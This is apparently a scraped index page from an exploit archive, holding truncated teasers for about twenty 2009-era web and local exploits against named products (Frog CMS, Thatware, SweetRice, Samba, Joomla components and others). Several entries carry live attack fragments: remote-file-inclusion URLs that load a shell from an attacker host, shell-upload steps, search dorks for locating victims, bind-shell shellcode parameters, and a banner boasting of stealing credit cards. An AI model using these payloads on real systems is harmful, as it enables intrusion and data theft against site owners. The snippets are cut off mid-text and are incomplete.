Maxs AJAX File Uploader Remote File Upload Vulnerability

No description provided by source. | | Max's AJAX File Uploader Remote File Upload Vulnerability | | Author : ViRuSMaN | | Contact : [email protected] | | Home : Islam-Attack.CoM , HackTeach.OrG | | Download : http://www.ajaxf1.com/download.html?dl=12 | | | | Exp : | | 1- Upload Your Shell...

Frog CMS 0.9.5 - Cross-Site Request Forgery

Frog CMS 0.9.5 - Cross-Site Request Forgery ------------------------------------------------------------------------------------------------- Title: Frog Date: 13. December 2009. -------------------------------------------------------------------------------------------------...

Illogator Shop - SQL Injection Bypass

Illogator Shop - SQL Injection Bypass Title: Illogator Shop SQL Injection Bypass Date: 11/12/2009 Author: bi0 CVE : /\ == \ /\ \ /\ \ \ \ \ \ \ \ \ /\ \ \ \ \ \ \ \ // // // ---------------------------------------------------------------- x Illogator Shop SQL Injection Bypass x Author : bi0...

Free ASP Upload - Arbitrary File Upload

/ \ / \ / \ | | |/ | | | Y Y | V\ / Y| || |/ / A ||| \ | | | | || || \ // \ | | | || | | |/ |/|/ |/ Free ASP Upload Shell Upload Vulnerability Created By Mr.aFiR Moroccan Hacker Email: [email protected] Website: www.aFiR.me c -- 10/12/2oo9 How to use it ? ----------------- Go to :...

PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow

!/usr/bin/env python IDEAL Administration 2009 v9.7 Local Buffer Overflow Exploit Found By: DrIDE Usage: Migrate - Open Migration Project - Bind Shell Download: www.pointdev.com Tested On: Windows XPSP3 windows/shellbindtcp - 696 bytes Encoder: x86/alphamixed EXITFUNC=seh, LPORT=4444 sc =...

DPI 1.1-final Powered by Clixint XSS

No description provided by source. andresg888 Vendor : http://www.image-host-script.com/ Contact : andresg8884tgmaildotcom Web: : www.ilegalintrusion.nethttp://www.ilegalintrusion.net & www.bl4ck-p0rtal.orghttp://www.bl4ck-p0rtal.org Dork : No DoRk f0R ScRipT KiDDieS Example1:...

Joomla! Component com_joomgallery 1.5.x - func Incorrect Flood Filter

Joomla! Component comjoomgallery 1.5.x - func Incorrect Flood Filter...

Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter

Exploit for unknown platform in category web applications ======================================================== Joomla 1.5.x comjoomgallery&func Incorrect Flood Filter ======================================================== 0day.today 2018-04-09...

Thatware 0.5.3 - Multiple Remote File Inclusions

Thatware 0.5.3 - Multiple Remote File Inclusions Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Thatware PoC : http://server/config.php?rootpath=http://attcker/shell.txt??? Vuln : ./thatwarepath/artlist.php line 28 PoC : http://server/artlist.php?rootpath=http://attcker/shell.txt??? Vuln :...

SweetRice <= 0.5.3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================== SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 0day.today 2018-03-28...

TEKUVA Password Reminder Authentication Bypass

No description provided by source. !/usr/bin/perl Exploit: TEKUVA Password Reminder Authentication Bypass Date: 11/19/2009 Author: iqlusion [email protected] Software Link: http://download.cnet.com/Password-Reminder/3000-20644-10966598.html Version: 1.0.0.1 Info: TEKUVA Password Reminder is a...

Home FTP Server 1.10.1.139 Traversal

Date of Discovery: 17-Nov-2009 Credits:zhangmcatmail.ustc.edu.cn Vendor: Ari Pikivirta http://downstairs.dnsalias.net/homeftpserver.html Affected: Home FTP Server 1.10.1.139 Earlier versions may also be affected Overview: Home FTP Server is an easy use FTP server Application. Directory Traversal...

Cifshanghai (chanpin_info.php) CMS SQL Injection

Exploit for unknown platform in category web applications ================================================ Cifshanghai chanpininfo.php CMS SQL Injection ================================================ ===================================== | cifshanghai.com script The news chanpininfo.php by pass...

kalimat new system v 1.0 (index.php) SQL Injection

No description provided by source. ===================================== | kalimat v 1.0 admin by pass index.php ===================================== Author: ProF.Code Email :[email protected] ===================================== dorkgoogle : intext:"Kalimat news system v 1.0" demo:...

迅雷看看 3.1.0 AvtiveX控件信息泄露漏洞

迅雷看看是迅雷公司出品的一款支持在线播放的视频播放软件 它所包含的DapCtrl控件包含有信息泄露漏洞 利用特殊构造的网页，攻击者可能通过调用.IsFileExist（文件名）方法获得返回值来发现是否存在本地文件，进而展开其他攻击。利用此漏洞攻击者无法获得文件的内容。 迅雷看看 = 3.2.0.248 临时解决方法： 为CLSID：ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8设置kill-bit。 厂商补丁： 迅雷网络技术有限公司 --------------------...

Bitrix Site Manager Multiple Remote File Include Vulnerability

No description provided by source. + Author : Don Tukulesto [email protected] + Date : November 13, 2009 + Homepage : http://www.indonesiancoder.com + Vendor : http://www.bitrixsoft.com/ + Method : Remote File Inclusion + Location : INDONESIA Notes : I know this is an old bugs, but i just...

Samba 3.0.10 &lt; 3.3.5 - Format String / Security Bypass

The following proof of concept is available: smb: \ put aa%3Fbb...

TFTgallery .13 - Directory Traversal

TFTgallery .13 - Directory Traversal Released information about the album parameter being vulnerable to XSS earlier. Seems there are other similar issues: The album parameter is vulnerable to directory transversal...

QuickTeam 2.2 SQL Injection

| D R U N K E N | || || || D A N I S H | || || |' R E D N E C K S '--''--''--' RESEARCH AND FUCKING HACKING: | DRUNKEN DANISH REDNECKS | || || || !!!!!!! | || || |' [email protected] '--''--''--' = QUICKTEAM 2.2 SQL INJECTION WE STEEL YOUR DAMNED CREDITCARDS HEHEHEEHEH | | "title"...

AdaptBB 1.0 Cross Site Scripting

| D R U N K E N | || || || D A N I S H | || || |' R E D N E C K S '--''--''--' RESEARCH AND FUCKING HACKING: | DRUNKEN DANISH REDNECKS | || || || !!!!!!! | || || |' [email protected] '--''--''--' = ADAPTBB 1.0 XSS | | "q" PARMETER IN INDEX.PHP @...